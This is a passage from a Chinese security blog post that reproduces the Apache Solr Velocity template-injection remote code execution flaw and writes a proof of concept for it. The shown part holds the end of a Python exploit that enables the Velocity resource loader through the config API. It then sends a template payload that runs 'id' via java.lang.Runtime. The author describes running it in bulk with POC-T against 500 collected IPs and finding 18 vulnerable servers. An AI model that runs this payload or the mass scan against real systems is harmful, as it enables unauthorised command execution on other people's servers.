class="string">"solr.VelocityResponseWriter"</span>,</span><br><span class="line">                                               <span class="string">"template.base.dir"</span>: <span class="string">""</span>, <span class="string">"solr.resource.loader.enabled"</span>: <span class="string">"true"</span>,</span><br><span class="line">                                               <span class="string">"params.resource.loader.enabled"</span>: <span class="string">"true"</span>&#125;&#125;</span><br><span class="line"></span><br><span class="line">        r3 = requests.post(debug_model_url, headers=modifyConfig_headers,json=modifyConfig_json)</span><br><span class="line">        <span class="keyword">if</span> r3.status_code == <span class="number">200</span> <span class="keyword">or</span> <span class="number">500</span>:</span><br><span class="line"></span><br><span class="line">                p = <span class="string">"/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"</span></span><br><span class="line">                target = url + <span class="string">'/solr/'</span> + jas502n_Core_Name + p</span><br><span class="line">                result = requests.get(url=target)</span><br><span class="line">                <span class="keyword">if</span> result.status_code == <span class="number">200</span> <span class="keyword">and</span> len(result.text) &lt; <span class="number">65</span>:</span><br><span class="line">                    <span class="keyword">return</span> url</span><br><span class="line">    <span class="keyword">except</span> Exception :</span><br><span class="line">        <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>然后将收集到的url进行批量验证</p>
<p>python2 POC-T.py -eT -t 50 -s solr_new_poc.py -iF C:\Users\Administrator\Desktop\txt\solrtest.txt</p>
<p>500个ip找到了18个存在漏洞的solr</p>
<p><img src="\img\1578280695409.png" alt="1578280695409"></p>
<p>更对关于POC-T的使用请移步GitHub（虽然作者很久没更新了哈哈哈，但是还是很好用的）</p>
<h4 id="0x07-参考"><a href="#0x07-参考" class="headerlink" title="0x07 参考"></a>0x07 参考</h4><p><a href="https://www.freebuf.com/column/218801.html" target="_blank" rel="noopener">https://www.freebuf.com/column/218801.html</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1532753" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1532753</a></p>
<p><a href="https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/" target="_blank" rel="noopener">https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/</a></p>
<p><a href="https://github.com/theLSA/solr-rce" target="_blank" rel="noopener">https://github.com/theLSA/solr-rce</a></p>
<p><a href="https://github.com/Xyntax/POC-T" target="_blank" rel="noopener">https://github.com/Xyntax/POC-T</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/01/07/Solr-Velocity-rce/">Solr Velocity rce</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 小白 的个人博客">小白</a></p>
        <p><span>发布时间:</span>2020年01月07日 - 09时40分</p>
        <p><span>最后更新:</span>2020年01月15日 - 15时10分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/01/07/Solr-Velocity-rce/" title="Solr Velocity rce">http://yoursite.com/2020/01/07/Solr-Velocity-rce/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2020/01/07/Solr-Velocity-rce/　　作者: 小白" title></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2020/09/18/搭建-web-运行的基础环境/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          搭建 web 运行的基础环境
        
      </div>
    </a>
  
  
    <a href="/2019/09/03/WebLogic-wls9-async反序列化远程命令执行漏洞复现/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">WebLogic wls9-async反序列化远程命令执行漏洞复现</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Apache-Solr-Velocity模版注入远程命令执行漏洞复现以及POC编写"><span class="toc-number">1.</span> <span class="toc-text">Apache Solr Velocity模版注入远程命令执行漏洞复现以及POC编写</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x01-漏洞概述"><span class="toc-number">1.0.1.</span> <span class="toc-text">0x01 漏洞概述</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x02-影响范围"><span class="toc-number">1.0.2.</span> <span class="toc-text">0x02 影响范围</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-本地复现"><span class="toc-number">1.0.3.</span> <span class="toc-text">0x03 本地复现</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x04-修补方法"><span class="toc-number">1.0.4.</span> <span class="toc-text">0x04 修补方法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x05-POC编写"><span class="toc-number">1.0.5.</span> <span class="toc-text">0x05 POC编写</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x06-批量验证"><span class="toc-number">1.0.6.</span> <span class="toc-text">0x06 批量验证</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x07-参考"><span class="toc-number">1.0.7.</span> <span class="toc-text">0x07 参考</span></a></li></ol></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>






    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2020/09/18/搭建-web-运行的基础环境/" title="上一篇: 搭建 web 运行的基础环境">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2019/09/03/WebLogic-wls9-async反序列化远程命令执行漏洞复现/" title="下一篇: WebLogic wls9-async反序列化远程命令执行漏洞复现">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/09/18/搭建-web-运行的基础环境/">搭建 web 运行的基础环境</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/07/Solr-Velocity-rce/">Solr Velocity rce</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/03/WebLogic-wls9-async反序列化远程命令执行漏洞复现/">WebLogic wls9-async反序列化远程命令执行漏洞复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/21/I-LIKE-YOU/">I LIKE YOU</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/06/五月六号杂句/">五月六号杂句</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/29/让你难过的事情就不要再坚持了/">让你难过的事情就不要再坚持了</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/29/metasploit常用命令/">metasploit常用命令</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/24/socket套接字/">socket套接字</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/24/php简介/">php简介</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/24/四月二十五杂句/">四月二十五杂句</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/24/人生/">人生</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/24/渗透测试一般过程/">渗透测试一般过程</a></li></ul>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2020 小白
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo &nbsp;&nbsp;</a><a href="https://github.com/qwe844607333" target="_blank">Blog</a> by 小白
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
	<div>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 5;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'xxxxx', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->



	<script>
	var _hmt = _hmt || [];
	(function() {
	  var hm = document.createElement("script");
	  hm.src = "//hm.baidu.com/hm.js?xxxxxx";
	  var s = document.getElementsByTagName("script")[0]; 
	  s.parentNode.insertBefore(hm, s);
	})();
	</script>



<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>